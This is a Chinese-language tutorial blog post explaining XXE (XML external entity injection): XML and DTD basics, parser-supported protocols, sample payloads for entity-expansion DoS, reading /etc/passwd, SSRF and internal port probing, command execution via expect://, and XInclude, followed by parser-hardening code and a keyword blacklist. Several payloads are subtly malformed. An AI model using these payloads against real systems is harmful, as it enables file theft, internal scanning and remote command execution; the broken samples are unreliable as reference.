XXE原理

于 2024-07-17 15:30:09 发布
阅读量629 收藏 13
点赞数 15
分类专栏: WEB安全基础 文章标签: 网络 服务器 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52579508/article/details/140496690
版权

什么是XXE 漏洞

XXE 漏洞全称 XML External Entity Injection 即xml 外部实体注入漏洞
XML是一种类似于HTML(超文本标记语言)的可扩展标记语言,是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
XXE漏洞发生再 应用程序解析xml输入时, 没有禁止外部的加载 ,导致可加载恶意外部文件 造成文件读取 命令执行 内网端口扫描 攻击内网网站 ,发起dos 攻击等危害
libxml2.9.1及以后,默认不再解析外部实体

XXE 的 基本语法

XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。

<?xml version="1.0">           //xml声明

<!DOCTYPE  note [
<!ELEMENT note (to, from, heading, body)>
<!ELEMENT to   (#PCDATA)>                     //文档类型定义
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body   (#PCDATA)>
]>

<note>
<to>George</to>
<from>John</from>                                 //文档元素
<heading>Reminder</heading>
<body>Don’t forget the meeting</body>

什么是DTD

<?xml version="1.0"?>  //这一行是 XML 文档定义
<!DOCTYPE message [
<!ELEMENT message (receiver ,sender ,header ,msg)>
<!ELEMENT receiver (#PCDATA)>
<!ELEMENT sender (#PCDATA)>
<!ELEMENT header (#PCDATA)>
<!ELEMENT msg (#PCDATA)>



<!DOCTYPE 根元素[
<!ELEMENT 根元素(元素1,元素2)>
<!ELEMENT 元素1(#PCDATA)>
<!ELEMENT 元素2(#PCDATA)>
  ]>

内部实体 与 引用外部实体

<?xml version="1.0" encoding="UTF-8" >
<!DOCTYPE abc [
	<!ELEMENT copyright "xx.xx.xx.xx">
]>
<abc>&copyright;</abc>

外部声明的格式分两种,对应的关键字为 “SYSTEM” 与 “public”

<?xml version="1.0" encoding="UTF-8">
<!DOCTYPE abc [ 
	<!ELEMENT abc  system "file:///etc/passwd">
]>
<abc>&abc;</abc>

引用公用 DTD

<!DOCTYPE 根元素 PUBLIC "DTD名称" "外部DTD的URL">

<!DOCTYPE 联系人列表 PUBLIC "联系人DTD" "http://www.mydomain.com/dtds/fclml.dtd">

支持的协议

LIBXML2PHPJAVA.NET
filefilehttpfile
httphttphttpshttp
ftpftpftphttps

| php | file | ftp |
|

| compress.zlib | jar |

|
|

| compress.bzip2 | netdoc |

|
|

| data | mailto |

|
|

| glob | gopher * |

|
|

| phar |

|

|

XML 的攻击方式

拒绝服务攻击

<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>

文件读取

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>




<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE ANY [ <!ENTITY file SYSTEM "file:///etc/passwd">]>
 <root>
 &words;
 </root>

SSRF

<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/" [
<!ELEMENT data (#ANY)>
]>
<data>4</data>

探测内网端口

<?xml version="1.0"?>
<!DOCTYPE xxx [
<!ELEMENT name ANY >
<!ELEMENT xxx SYSTEM "http://192.168.10.1:22">
]>
<data>4</data>

RCE

<?xml version="1.0"?>
<!DOCTYPE GVI [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<catalog>
   <core id="test101">
      <description>&xxe;</description>
   </core>
</catalog>

Include

<?xml version='1.0'?>
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://publicServer.com/file.xml"></xi:include></data>

预防

在语言中禁用外部实体的方法

PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false); .setFeature("http://apache.org/xml/features/disallow-doctype-decl",true); .setFeature("http://xml.org/sax/features/external-general-entities",false) .setFeature("http://xml.org/sax/features/external-parameter-entities",false);
Python:
from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

黑名单过滤

过滤关键词:
<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC

预定义字符转义:
<       &lt; >       &gt; &       &amp; ‘      &apos; “      &quot;

禁用外部实体:libxml_disable_entity_loader(true);

参考:
https://www.freebuf.com/articles/web/255492.html
https://www.freebuf.com/articles/web/256728.html
https://xz.aliyun.com/t/3357#toc-21
https://websec.readthedocs.io/zh/latest/vuln/xxe.html
https://www.secpulse.com/archives/189161.html

小龙_(R0 Team)
关注
  • 15
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE原理简介、防御方案
qq_37432174的博客
11-24 6496
某些应用程序允许XML 格式的数据输入和解析,可以通过引入外部实体的方式进行攻击。,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。
2021-03-28-xxe原理及利用
qq_50963064的博客
11-16 373
XML基础知识 什么是XML XML 指可扩展标记语言(EXtensible Markup Language)。 XML 是一种标记语言,很类似HTML。 XML 的设计宗旨是传输数据,而非显示数据。 XML 标签没有被预定义,您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准。 特点: XML仅仅是纯文本,它不会做任何事情。 XML可以自己发明标签(允许定义自己的标签和文档结构)。 XML无处不在。XML是各种应用程序之间进行数据传输的最常用的工具,并且在信息存储和描述
XXE原理及利用防御
MAPLE102424的博客
05-15 313
XXE 漏洞全称XML External Entity Injection,即 xml 外部实体注入漏洞,XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
XXE漏洞原理
Playwin
03-02 4087
XXE漏洞是XML外部实体注入漏洞,那什么是外部实体呢? XML DTD 1、文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 2、DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 Ps:第二条是重点,也是XXE漏洞产生的原因,DTD可以定义外部实体并引用 DTD语法 若DTD要在XML文档中使用,他需要包含在·DOCTYPE声明...
XXE 原理漏洞详解.md
04-03
XXE原理漏洞,易懂。
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞的测试原理可以分为以下几个步骤: 首先,攻击者需要构造恶意的 XML 文档,该文档中包含外部实体的引用。然后,攻击者将该文档发送给服务器,并 trick 服务器将任意文件读取出来。最后,攻击者可以通过查看...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
**一、XXE漏洞原理** XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以...
信息安全_xxe注入应用与拓展.pptx
08-14
XXE注入详解】 XXE,全称为XML External Entity Injection,是针对XML解析器的一种安全漏洞,它利用XML文档中的外部实体(External Entity)...开发者应当了解其原理,采取有效措施预防此类攻击,以保护系统的安全
XXE超详细讲解 全网仅此一份
07-06
本文将深入讲解XXE漏洞的原理、危害、环境及检测思路。 首先,我们需要了解XML的基础概念。XML(可扩展标记语言)是一种用于数据传输和存储的语言,它采用树形结构,由自定义的标签组成,类似于HTML。然而,XML和...
AI基于大模型语言存在的网络安全风险
yh
07-16 244
AI网络安全
RIP路由协议概述
张海涛的专栏
07-12 257
若该条路由在被记为16跳后,120s内还没有收到更新,则将这条路由从路由表中删除。发送路由更新时,目标地址为广播地址:255.255.255.255。路由器每隔30s从每个启动RIP协议的接口发送出路由更新信息。若一条路由在180s内没有收到更新,这条路由的跳数将记为16。发送路由更新时,目标地址为组播地址224.0.0.9。RIP是一个【距离——矢量】路由选择协议。发送路由更新时【不携带】子网掩码,属于。发送路由更新时【携带】子网掩码,属于。当路由器的更新周期为30s到来时,向邻居发送路由表。
【windows|014】TCP协议详解
小鹏linux的博客
07-15 943
TCP是一种面向连接的、可靠的、基于字节流的传输层通信协议。它工作在OSI模型的第四层,即传输层,为用户提供可靠的、有序的和无差错的数据传输服务。TCP协议与UDP协议是传输层的两大主要协议,但两者在设计上有明显的不同:TCP提供的是可靠的数据传输服务,而UDP则更注重传输的速度和效率
智能车存在网络安全隐患,如何应设计出更好的安全防护技术?
tigerman20201的博客
07-13 272
然而,高度的网络化和智能化也使智能车面临着严峻的网络安全挑战,如远程攻击、数据泄露和恶意控制等。未来,随着技术的不断发展,应持续加强对智能车网络安全的研究和创新,以应对不断变化的安全威胁。摘要:随着智能车技术的迅速发展,车辆的网络连接性不断增强,然而这也带来了诸多网络安全隐患。本文深入探讨了智能车面临的网络安全威胁,并提出了一系列创新的安全防护技术设计,旨在为智能车的安全运行提供更可靠的保障。黑客可以通过公共网络对智能车的通信系统进行攻击,干扰车辆的正常运行,甚至获取车辆的控制权。
计算机网络复习笔记【面向考纲整理】
07-13 374
计算机网络(简称网络)由若干结点(node,节点)和连接这些结点的链路(link)组成。
H3C Intelligent Management Center无线认证新增设备如何配置
大鹏的博客
07-12 891
因为出口有多条宽带,所以静态路由要配置目的地址和下一跳,我太相信分公司的工程师了,导致一直有问题,没有正确指下一跳,然后一直通信单向可以,双向不行。下面有监控信息说明配置成功,配置的时候需要信息一致,包括高级设置重点安全提议,共享密钥等等。创建接入服务,调用接入策略,由于接入设备上配置带域名发送,则此处需配置服务后缀,与域名相同。选择手工增加设备,添加设备ip,若设备上配置nas ip,此处填nas ip地址。#// 配置portal服务器ip,共享密钥,重定向url。:共享密钥与设备侧填写的要一致,
Linux系统
Baizeh的博客
07-16 765
把windows开发好的程序部署到linux操作系统上,因为windows操作系统漏洞太多容易被攻击。
计网(1.1~1.4)
2301_76590691的博客
07-12 563
网络:由若干结点和连接这些结点的链路组成互联网:多个网络还可以通过路由器互连起来,这样就构成了一个覆盖范围更大的网络,也可 被称为“网络中的网络因特网是世界上最大的互连网络计算机网络的精确定义并未统一计算机网络的简单定义:一些互相连接的、自治的计算机的集合互连是指计算机之间可以通过有线或无线的方式进行数据通信自治是指独立的计算机,它有自己的硬件和软件,可以单独运行使用集合是指至少需要两台计算机。
linux学习笔记整理: 关于linux系统介绍 2024/7/16;
最新发布
gzx233的博客
07-16 705
linux基础介绍和指令
xxe漏洞原理及防御方式
05-25
XXE(XML External Entity)漏洞是一种常见的Web应用程序安全漏洞,攻击者利用这种漏洞可以读取本地文件、发起内部网络攻击等。XXE漏洞的原理是通过在XML文档中插入恶意实体来触发解析器加载恶意实体,从而发起攻击。 以下是XXE漏洞的防御方式: 1.禁止使用外部实体:在解析XML文档时,应该禁止使用外部实体,避免攻击者利用外部实体来读取本地文件等。 2.使用白名单:仅允许特定的实体和DTD(Document Type Definition)文件,不允许使用任意的实体和DTD文件。 3.过滤输入数据:在接收用户输入数据时,应该对输入数据进行过滤和检查,避免恶意实体被插入到XML文档中。 4.升级解析器:使用最新版本的XML解析器可以提高安全性,因为新版本通常会修复已知的漏洞。 5.使用WAF(Web应用程序防火墙):WAF可以检测并防止XXE漏洞攻击,建议在Web应用程序中使用WAF。 总之,XXE漏洞是一种常见的Web应用程序安全漏洞,开发人员应该注意防范和修复这种漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值